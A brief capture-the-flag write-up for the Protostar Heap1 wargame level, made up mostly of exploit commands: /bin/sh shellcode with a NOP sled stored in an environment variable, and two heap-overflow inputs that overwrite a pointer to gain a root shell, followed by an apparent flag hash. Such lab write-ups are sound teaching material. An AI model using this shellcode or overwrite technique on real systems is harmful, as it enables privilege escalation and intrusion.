Protostar Heap1:

Calling premade functions is boring, rooting is better.

Just put a shellcode in you env with a nopsled:
	export SC=`python -c 'print "\x90" * 42 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Then get it's address:
	/tmp/getenvaddr SC level7
		SC will be at 0xbfffff0b
Then with the first strcpy put to scope to the pointer we wanna change (fgets dereferencing):
	./level7 `python -c 'print "A" * 20 + "\x34\x99\x04\x08"'` "AAAA"
Then change the value to the one of the shellcode
	./level7 `python -c 'print "A" * 20 + "\x34\x99\x04\x08"'` `python -c 'print "\x0b\xff\xff\xbf"'`

Et voila !

5684af5cb4c8679958be4abe6373147ab52d95768e047820bf382e44fa8d8fb9
